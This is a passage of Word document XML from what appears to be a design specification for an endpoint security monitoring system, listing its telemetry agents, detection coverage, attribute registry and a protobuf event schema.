        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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4BA9AA7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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5CBACBE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mDNSResponder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>resolvectl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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1AED815" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DGA, beaconing, NXDOMAIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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BA4560D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DoH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/DoT, limited process binding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="23620DA2" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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2058DDC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>KernelAudit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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A200ED0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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AE4E588" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>5s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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A464D14" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Linux (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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607B45C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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09EFAD3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Syscall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> tracing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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E093C7A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Requires </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, Linux-only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="0B3E274D" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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3B1B641" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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3A98A25" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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A257F91" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>15s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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B9B9425" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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A8F51AB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lsof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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73CDB20" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Port scan, lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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4AF1179" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Snapshot-based (no payload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6E3898C3" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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A766E5E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Peripheral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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C74EB3B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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C712388" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>10s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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B6CDDDD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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A884FBC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ioreg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sysfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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A67C113" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>USB inventory, HID anomalies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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966F7AE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Heuristic classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="22F54DD8" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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C4966C8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>DeviceDiscovery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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6F8B662" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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E79C27D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>30s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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0271D09" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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791C420" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ARP scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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E1DE202" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Network asset discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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B742D29" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">ARP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>spoofable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, expensive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37B82A0A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F31A1EB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Attribute Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D7782" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>For each agent, key attributes are captured with classification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E8679" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Raw OS: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, port, protocol, domain, timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9BE66" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Derived: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>risk_score</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>anomaly_score</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, confidence, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_suspicious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dga_score</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B0A4537" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Normalized: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mitre_techniques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (JSON array), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>event_category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>event_action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="340E3A0E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optional: geo_*, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">_*, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>threat_intel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D5F438" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B06C69C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Schema Summary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4"/>
        <w:gridCol w:w="2572"/>
        <w:gridCol w:w="4072"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="641E48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5DFE2656" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Field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7A119F02" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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110E13E7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="3A0636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8C7B0F1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>version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FDC15FF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>string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944A8A2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Schema version identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="301303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B5C2891" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns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98D0B0F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>uint64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2EE03C1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Nanosecond timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6C772D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48CEAEF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>idempotency_key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D1DAD7E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>string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6956602" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Deduplication key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="747FB0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30BDD27" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>flow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92FEC9E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>FlowEvent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E95663A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Network telemetry (one-of)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="0F80C7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1A08BC8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>process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71F626D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProcessEvent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A0FE995" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Process telemetry (one-of)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6365D0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A80D8E8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_telemetry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C0E11C7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DeviceTelemetry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2CCBC6F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Device metrics (one-of)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="2A93D8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3FEB672" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>sig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DAA0B9A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>bytes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F8C0B22" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Ed25519 signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="272FA0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4DE616A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prev_sig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24BC5A5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>bytes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FEA363E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Previous hash in chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="3925C7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921766D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>signing_algorithm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3C932C0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>string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8ACD2F5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Algorithm identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4EF104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95E03C3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r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6C34CE6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>string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D69CD2D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Routing hint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="16A485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F58A531" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>schema_version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6C60F62" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>uint32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749007E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Forward </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>compat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> marker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40AB84B1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0E5CC3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FlowEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, protocol, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bytes_tx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bytes_rx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, flags, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>duration_ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — 14 fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35094BE1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, exe, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, username, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpu_percent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>memory_percent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — embedded in envelope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B0C291" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>device_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>device_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>total_processes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>total_cpu_percent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — 20+ fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825079F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
